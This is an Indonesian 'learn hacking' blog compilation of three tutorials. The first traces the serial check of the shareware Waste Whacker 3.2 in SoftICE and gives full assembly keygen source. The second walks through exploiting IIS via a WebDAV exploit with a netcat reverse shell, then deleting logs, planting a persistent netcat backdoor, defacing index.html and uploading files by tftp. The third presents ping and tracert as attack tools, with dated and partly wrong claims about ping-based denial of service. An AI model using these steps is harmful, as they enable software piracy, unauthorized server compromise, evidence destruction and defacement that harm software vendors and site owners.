dan masukkan website yang anda inginkan pada website translation blank.
SELECT ANY LANGUAGE lalu TRANSLATED TO ENGLISH maka akan membawa halaman tersebut dalam bahasa Inggris (kecuali mesin pencari Yahoo, tapi mesin pencari altavista akan bekerja!)"

BELAJAR HACKING "Waste Whacker 3.2"

2009-04-26T21:32:00.000-07:00

Mengikuti jejak flag eRRatum dengan tutorial - tutorial KeyGen-nya, di sini aku juga mencoba membuat tutorial pembuatan KeyGen. Sedikit perbedaan yang ada dengan tutorial - tutorial flag lainnya, aku menggunakan Assembly sebagai bahasa pemrograman untuk pembuatan KeyGen ini.
Pengenalan Program

Penjelasan singkat mengenai Waste Whacker :

"Waste Whacker automates the process of removing unwanted files from your hard drives. These files can be backup files created by many applications, temp files not removed by Windows or other programs, files with a zero-byte size, old Internet cache files, plus many others. All files types are customizable by the user. Files can be sent to the Recycle Bin, completely removed from the system, or archived for later retrieval. Additionally, Waste Whacker can be run during Windows bootup."

Program ini akan menampilkan tulisan "Trial Version...Purcahase it for $19.95" selama kita masih belum memasukan kode registrasi yang benar.
Essay

Seperti biasa kita mmemulai dengan mengamati Progrtam Target kita. Waste Whacker menyediakan menu khusus untuk memasukan Nama dan S/N bagi User yang telah membeli s/w tersebut ( Option >> Register ). Jika kita memasukan Nama dan S/N yang salah, akan tampil sebuah MessageBox bertuliskan "Registration Failed" dan tetapi kita masih tetap diperbolehkan menggunakan Waste Whacker ( baik bukan ? ;-) )

Oke sekarang ulangi langkah di atas, masukan kembali Nama dan sembarang s/n, untuk tutorial ini, aku masukin :

User Name : CHuPaCaBRa
Registration Number : 123454321

Sebelum menekan tombol OK, kita siapkan "Peralatan Perang" kita, masuk ke SoftICE dengan menekan Ctrl-D dan pasang Breakpoint di Hmemcpy ( BPX Hmemcpy ). Kenapa Hmemcpy ??? Aku pasang Hmemcpy karena Breakpoint ini secara umum diguanakan untuk mengambil inputan kita.

Tekan Ctrl-D kembali dan klik tombol OK. Kau akan "terlempar" masuk ke dalam SoftICE pada rutin Hmemcpy. Saat itu kau belum berada di badan program, karena itu tekan F12 beberapa kali sampai kau sudah masuk ke dalam program Waste Whacker.

Break due to BPX KERNEL!HMEMCPY
0177:00475545 MOV EDX,[EBP-0C] ==> Kita di sini

Ketik D EDX untuk melihat apa yang baru saja dibaca oleh Hmemcpy.

:d edx
017F:00C7DF60 31 32 33 34 35 34 33 32-31 00 C7 00 D8 DF C7 00 123454321.......

Hmmm....ternyata program target kita ini membaca s/n yang kita masukan terlebih dulu. Pasang Breakpoint di memory yang bersangkutan supaya SoftICE akan berhenti jika program mencoba mengakses s/n kita. Ketik BPM 017F:00C7DF60.

Sementara ini nama kita belum dibaca, tekan F5 satu kali, SoftICE kembali akan berhenti di dalam fungsi Hmemcpy. Tekan F12 beberapa kali sampai kamu kembali ke dalam badan program.

Break due to BPX KERNEL!HMEMCPY
0177:00475561 MOV EDX,[EBP-0C] ==> Kita di sini

Cek lagi apa yang tadi dibaca oleh Hmemcpy. Ketik D EDX kembali

:d edx
017F:00C7DF78 43 48 75 50 61 43 61 42-52 61 00 00 00 00 00 00 CHuPaCaBRa......

Pasang Breakpoint di memory tersebut, BPM 017F:00C7DF78
0177:00475564 LEA EAX,[EBX+3C]
0177:00475567 CALL 00403BB0
0177:0047556C LEA ECX,[EBP-04]
0177:0047556F MOV EDX,[EBX+3C]
0177:00475572 MOV EAX,[EBX+24]
0177:00475575 CALL 00474E9C
0177:0047557A CMP DWORD PTR [EBP-04],00 ==> Cek apa User sudah
memasukan nama atau
belum

Buat menyingkat waktu, tekan F5, SoftICE akan berhenti jika Program mencoba mengakses Nama ataupun S/N yang kita masukan. Kamu bakal menemukan listing seperti ini :
0177:00474EF2 MOVZX ESI,BYTE PTR [EBP-09]
0177:00474EF6 MOV EAX,[EBP-08]
0177:00474EF9 MOV AL,[ESI+EAX-01] ==> AL = Karakter dari nama
yang kita masukan
0177:00474EFD CALL 00402980 ==> Rutin Call u/ merubah
Huruf Kecil menjadi
Huruf Besar
0177:00402980 CMP AL,61 ==> AL < 61h ( = "a" ) ???
0177:00402983 JB 0040298D ==> Lompat, jika YA !
0177:00402985 CMP AL,7A ==> AL > 7Ah ( = "z" ) ???
0177:00402988 JA 0040298D ==> Lompat, jika YA !
0177:0040298A SUB AL,20 ==> AL = AL - 20h
0177:0040298D RET
0177:00474F02 ADD AL,D0
0177:00474F04 SUB AL,0A
0177:00474F06 JB 00474F0E
0177:00474F08 ADD AL,F9
0177:00474F0A SUB AL,1A
0177:00474F0C JAE 00474F2F
0177:00474F0E MOV EAX,[EBP-08]
0177:00474F11 MOV AL,[ESI+EAX-01]
0177:00474F15 CALL 00402980 ==> Perhatikan Rutin Call
di atas
0177:00474F1A MOV EDX,EAX
0177:00474F1C LEA EAX,[EBP-1C]
0177:00474F1F CALL 00403D00
0177:00474F24 MOV EDX,[EBP-1C]
0177:00474F27 LEA EAX,[EBP-10]
0177:00474F2A CALL 00403DE0
0177:00474F2F INC BYTE PTR [EBP-09] ==> [EBP-09] = [EBP-09] + 1
0177:00474F32 DEC BL
0177:00474F34 JNZ 00474EF2 ==> Looping sampai semua
Karakter dari User Name
telah dirubah menjadi
Huruf Besar

Mungkin kamu rada bingung ngeliat ada baris perintah yang ngak aku beri komentar....ini aku sengaja, karena baris - baris perintah itu tidak terlalu dibutuhkan pada saat pembuatan KeyGen nantinya :-)
0177:00474F4B CALL 00403DD8 ==> Rutin Call untuk meng-
hitung Panjang Nama
0177:00474F50 MOV [EBP-15],AL ==> [EBP-15] = Panjang Nama
0177:00474F53 MOV BYTE PTR [EBP-09],0C ==> Panjang S/N = 0Ch
( = 12 karakter )
0177:00474F57 XOR EAX,EAX ==> Kosongkan register EAX
0177:00474F59 MOV AL,[EBP-15] ==> AL = Panjang Nama
0177:00474F5C CALL 00402BA4 ==> Rutin Call untuk memi-
lih Karakter Nama yang
akan "diolah".
0177:00402BA4 IMUL EDX,[004BA040],08088405 ==> EDX=2ED03ED0h*08088405h
0177:00402BAE INC EDX ==> EDX = EDX + 1
0177:00402BAF MOV [004BA040],EDX ==> [004BA040] = EDX
0177:00402BB5 MUL EDX ==> EAX = EAX mul EDX
0177:00402BB7 MOV EAX,EDX ==> EAX = EDX
0177:00402BB9 RET
0177:00474F61 INC EAX ==> EAX = EAX + 01h
0177:00474F62 AND EAX,000000FF ==> EAX = EAX and 000000FFh
0177:00474F67 MOV EDX,[EBP-10] ==> EDX = User Name
0177:00474F6A MOV BL,[EAX+EDX-01] ==> BL = Karakter Name pada
posisi [EAX + EDX + 01]
0177:00474F6E TEST BL,BL
0177:00474F70 JBE 00474F83
0177:00474F72 MOV EAX,0000000A ==> EAX = 0000000Ah
0177:00474F77 CALL 00402BA4 ==> Rutin Call ini sekarang
digunakan untuk
menghitung S/N.
0177:00474F7C MOV [EBP-0A],AL ==> Hasil Rutin Call di atas
dimasukan ke [EBP-0A]
0177:00474F7F DEC BL ==> BL = BL - 1
0177:00474F81 JNZ 00474F72 ==> Looping selama BL <> 0
0177:00474F86 XOR EAX,EAX ==> Kosongkan Register EAX
0177:00474F88 MOV AL,[EBP-0A] ==> AL = [EBP-0A]
0177:00474F8B CALL 0040875C ==> Merubah nilai AL yang
berbentuk Hexa menjadi
angka Decimal
0177:00474F90 MOV EDX,[EBP-1C]
0177:00474F93 LEA EAX,[EBP-14]
0177:00474F96 CALL 00403DE0 ==> [EBP-14] = AL
0177:00474F9B DEC BYTE PTR [EBP-09] ==> [EBP-09] = [EBP-09] - 1
0177:00474F9E JNZ 00474F57 ==> Looping selama 12 kali.

Langkah di atas ( 00474F57 - 00474F9E ) akan diulang sebanyak 12 kali hingga mendapatkan sebuah serial number. Setelah keluar dari looping di atas, coba liat apa isi [EBP-14]. Ketik D *(EBP-14)

:d *(ebp-14)
017F:00C7A3E4 37 37 31 38 31 37 33 32-38 31 32 35 00 A4 4B 00 771817328125..K.

Itu dia serial number-nya :-) Disable semua Breakpoint ( BD * ) dan kembali ke Waste Whacker, register menurut nama dan serial number yang sudah tampak tadi dan hasilnya......SUKSES :-)
K e y G e n Z

.Ok....now is the hard part :-) Berikut adalah listing Assembly untuk pembuatan KeyGen :.
; Waste Whacker 3.2 Key Generator.
; CHuPaCaBRa - 140299
; eRRatum Krak House - http://all.at/ekh
;Gunakan Tasm dan Tlink untuk meng-compile file *.asm ini
;========================================================================
.MODEL SMALL
.STACK 100h
.386P ;Menggunakan register 32-bit
.DATA
input DB 22h,0
Prompt DB 'User Name : ','$'
Err1 DB 'U must enter a name !','$'
lf DB 0ah,0dh,'$'
Tamp DD 2ED03ED0h
Tamp2 DB ?
logo DB 0ah,0dh, '>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<',0ah,0dh
DB '>> <<',0ah,0dh
DB '>> Waste Whacker 3.2 Key Generator <<',0ah,0dh
DB '>> Kraked by CHupaCaBRa <<',0ah,0dh
DB '>> eRRatum Krak House <<',0ah,0dh
DB '>> -= http://all.at/ekh =- <<',0ah,0dh
DB '>> <<',0ah,0dh
DB '>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<',0ah,0dh
DB 0ah,0dh,'$'

.CODE
START:
MOV AX,@DATA
MOV DS,AX
MOV ES,AX
LEA EDX,[logo]
MOV AH,09h
INT 21h ;Tampilkan Logo
LEA EDX,[prompt]
MOV AH,09h
INT 21h ;Tampilkan Prompt
LEA EDX,[input]
MOV AH,0Ah
INT 21h ;Ambil Nama yang di-input
LEA EDX,[lf]
MOV AH,09h
INT 21h ;Turun Satu Baris
CMP BYTE PTR [input+1],00
JE error ;Lompat jika nama koosng
LEA EDI, input+1
XOR EAX, EAX
MOVZX ECX,BYTE PTR [EDI] ;Ambil panjang Nama.
PUSH ECX ;Simpan di dalam Stack

Konvert:
MOV BL, BYTE PTR [EDI+EAX+01] ;BL = Karakter Nama
TEST BL, BL
JZ KeyGen
CMP BL, 61h ;BL > 61h ( = 'a' ) ???
JB Hrf_Besar
CMP BL, 7Ah ;BL < 7Ah ( = 'z' ) ???
JA Hrf_Besar
SUB BL, 20h ;BL = BL - 20h
MOV BYTE PTR [EDI+EAX+01],BL ;Ganti huruf kecil dengan
;huruf besar
Hrf_Besar:
INC EAX ;EAX = EAX + 1
LOOP Konvert ;Looping sebanyak Karakter
;Nama
MOV ECX, 0Ch ;"KeyGen" diulang 12 kali
KeyGen:
XOR EDX, EDX ;Kosongkan register EDX
XOR EAX, EAX ;Kosongkan register EAX
POP EBX ;Ambil panjang Nama dari
;dalam Stack
MOV AL, BL ;AL = BL
PUSH EBX ;Simpan Panjang Nama
;ke dalam Stack kembali
CALL @Proses ;Jalankan "Proses"
INC EAX ;EAX = EAX + 1
AND EAX, 000000FFh ;EAX = EAX and FFh
MOV BL, [EAX+EDI] ;BL=Karakter Nama pada
; posisi [EAX + EDX + 01]
Loop1:
MOV EAX, 0Ah ;EAX = 0Ah
CALL @Proses ;Jalankan "Proses"
MOV Tamp2, AL ;Tamp2 = AL
DEC BL ;BL = BL - 1
JNZ Loop1 ;Looping selama BL <> 0
ADD [Tamp2], 30h ;Rubah Tamp2 yang berbentuk
;Hexa menjadi angka Decimal
MOV DL, [Tamp2]
MOV AH, 02h
INT 21h ;Tampilkan nilai Decimal
;tersebut
DEC ECX ;ECX = ECX - 1
JNZ KeyGen
JMP Selesai
error:
LEA EDX,[Err1]
MOV AH,09h
INT 21h ;Tampilkan Err1
Selesai:
MOV AX,4C00h
INT 21h ;Exit Program
@Proses: ;Procedure "Proses"
IMUL EDX, Tamp, 08088405h
INC EDX
MOV Tamp, EDX
MUL EDX
MOV EAX, EDX
RET
END START
Catatan Singkat

Untuk mendapatkan serial number Waste Whacker relatif mudah tetapi membuat KeyGen-nya ternyata lebih sulit dari yang aku duga :-) Semula aku mencoba membuat KeyGen dengan menggunakan Turbo C / C++, ternyata bahasa pemrograman ini ngak bisa mengatasi besarnya angka yang terlibat di dalam pembuatan s/n tersebut. Oleh karena itu, jalan satu - satunya adalah dengan menggunakan Assembly. Keuntungan dari program KeyGen yang menggunakan Assembly adalah ukuran file-nya yang jauh lebih kecil, tapi di lain pihak, tingkat kesulitannya lebih tinggi daripada membuat KeyGen dengan bahasa pemrograman tingkat tinggi seperti Pascal atau Turbo C / C++. So...choose your language wisely :-)

Setelah mempelajari beberapa tutorial Kraking yang menggunakan Assembly sebagai bahasa pemrograman, aku mencoba membuat KeyGen Waste Whacker dan ternyata sukses....lumayanlah buat newbie kaya' aku ini :-)

Selain itu, untuk menyelesaikan KeyGen tersebut, aku juga mendapat bantuan dari SoftICE 2.80 ( DOS Version ),great tools to debug DOS program...... :-)

Kalo kamu pengen nyoba ngeKrak program lain dengan proteksi serupa, kamu bisa mencoba product DBytes lainnya di http://www.dbytes.com/
GreetZ

GreetZ buat Kraker - Kraker Asia ;-)

BELAJAR HACKING : Panduan Melakukan Hacking IIS webserver

2009-04-26T07:37:00.000-07:00

1) Pendahuluan

Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan

Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.

Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.

Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa....aaaa

Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.

Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.

Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J

3) Mengeksploitasi celah keamanan dan Mengendalikan webserver

Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ....

Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.

D:\vcproject\webdave\debug>web.exe

[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer

syntax: D:\WEB.EXE [padding]

Cool !!! Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:

D:\vcproject\webdave\debug>web.exe 123.123.123.123 200.200.200.200 6666

Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.

D:\nc>nc -Lvp 6666

Listening on [any] 6666 ....
connect to 200.200.200.200 from 123.123.123.123

Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.

C:\winnt\system32>

Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.

4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?

Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.

C:\winnt\system32> rmdir /s /q logfiles

Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.

Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.

Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.

Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:

C:\inetpub\wwwroot> copy index.html indexold.html

C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html

Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:

C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html

Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:

C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100

Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.

5) Kesimpulan

Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.

Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

BELAJAR HACKING : Hacking Menggunakan DOS

2009-04-26T07:31:00.000-07:00

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.

Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com”

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms

Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.

3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.

***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
